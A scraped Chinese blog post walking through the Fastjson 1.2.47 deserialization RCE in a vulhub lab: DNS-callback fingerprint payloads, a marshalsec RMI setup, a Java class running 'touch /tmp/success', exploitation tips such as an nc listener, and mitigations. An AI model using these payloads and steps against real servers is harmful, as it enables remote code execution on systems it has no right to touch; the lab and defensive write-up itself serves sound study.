Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

12 六月

星期五, 12 六月 2020 20:26 Last Updated on 星期五, 12 六月 2020 20:26 0 Comments

1. 漏洞简介

Fastjosn 无疑是这两年的漏洞之王, 一手反序列化RCE影响无数厂商, 目前1.2.48以下版本稳定受影响, 1.2.68以下版本开启Autotype会受到影响

(不排除传说中的1.2.67以下RCE漏洞, 期待八仙过海)

2. 影响组件

Fastjson < 1.2.48 (<1.2.68?)

3. 漏洞指纹

可以通过DNS回显的方式检测后端是否使用Fastjson

 {"@type":"java.net.Inet4Address", "val":"dnslog"} {"@type":"java.net.Inet6Address", "val":"dnslog"} {"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}} {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""} {{"@type":"java.net.URL", "val":"dnslog"}:"aaa"} Set[{"@type":"java.net.URL", "val":"dnslog"}] Set[{"@type":"java.net.URL", "val":"dnslog"} {{"@type":"java.net.URL", "val":"dnslog"}:0

可以通过DOS时间延迟或者报错回显的方式检测

4.漏洞分析

用marshalsec开启RMI服务

git clone https://github.com/mbechler/marshalsec.git

mvn clean package -DskipTests

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

执行如下命令启动一个spring web项目，其中使用fastjson作为默认json解析器：

 cd vulhub/fastjson/1.2.24-rce  docker-compose up -d

访问https://your-ip:8090即可看到一个json对象被返回，我们将content-type修改为application/json后可向其POST新的JSON对象，后端会利用fastjson进行解析。

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

目标环境是openjdk:8u102，这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，我们可以简单利用RMI进行命令执行。

用javac编译代码

 // javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process; public class TouchFile {     static {         try {             Runtime rt = Runtime.getRuntime();             String[] commands = {"touch", "/tmp/success"};             Process pc = rt.exec(commands);             pc.waitFor();         } catch (Exception e) {             // do nothing         }     } }

用python搭建http

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.class：

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

向目标发送payload即可

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

5. 利用技巧

1.如何查看服务器的jdk版本呢, 这里也有个小技巧

nc -lvvp 80#[marshalsec中指定的HTTP端口]

当服务器连接过来时, User-Agent中会标明当前服务器的JDK版本

2.当发现一台Redis的数据中有@type字样时, 意味着autotype大概率是开的, 只要不存在黑名单中的利用链都可以用#[同理可以用在jackson上]

fastjson/GenericFastJsonRedisSerializer.java at master · alibaba/fastjson
https://github.com/alibaba/fastjson/blob/master/src/main/java/com/alibaba/fastjson/support/spring/GenericFastJsonRedisSerializer.java

 public class GenericFastJsonRedisSerializer implements RedisSerializer<Object> { private final static ParserConfig defaultRedisConfig = new ParserConfig(); static { defaultRedisConfig.setAutoTypeSupport(true);}

其他消息队列之类的都是同理

6. 防护方法

1.升级Fastjson到最新版(>=1.2.68 新增了safemode, 彻底关闭autotype)
2.WAF拦截过滤请求包中的 @type, %u0040%u0074%u0079%u0070%u0065, u0040type, x04type等多种编码的autotype变形

3.最少升级到1.2.48以上版本且关闭autotype选项

4.升级对应JDK版本到 8u191/7u201/6u211/11.0.1 以上

展开阅读全文

评论
x
海报

扫一扫，海报
手机看

到微信朋友圈

x

扫一扫，手机阅读
打赏

打赏

安徽锋刃科技

“你的鼓励将是我创作的最大动力”

5C币 10C币 20C币 50C币 100C币 200C币

确定

Fastjson1.2.47远程命令执行漏xuandaoahfengren的博客-

本页所有内容来自官方网站 https://www.imapbox.com 新闻来源：互联网搜索引擎和新闻站

本网页所有图片由 ImageBox 图片批量下载器,网页图片批量下载专家,网页图片批量下载器,获取到文章图片，下载并得到。

ImageBox 图片批量下载器工具地址: 网页图片批量下载工具-最新版本下载

非凡下载站地址：https://www.crsky.com/soft/35838.html

本网页所有视频内容由 imoviebox边看边下-网页视频下载, iurlBox网页地址收藏管理器下载并得到。

ImovieBox网页视频下载器下载地址: ImovieBox网页视频下载器-最新版本下载

本文章由: imapbox邮箱云存储,邮箱网盘,ImageBox 图片批量下载器,网页图片批量下载专家,网页图片批量下载器,获取到文章图片,imoviebox网页视频批量下载器,下载视频内容,为您提供.

阅读和此文章类似的: 全球云计算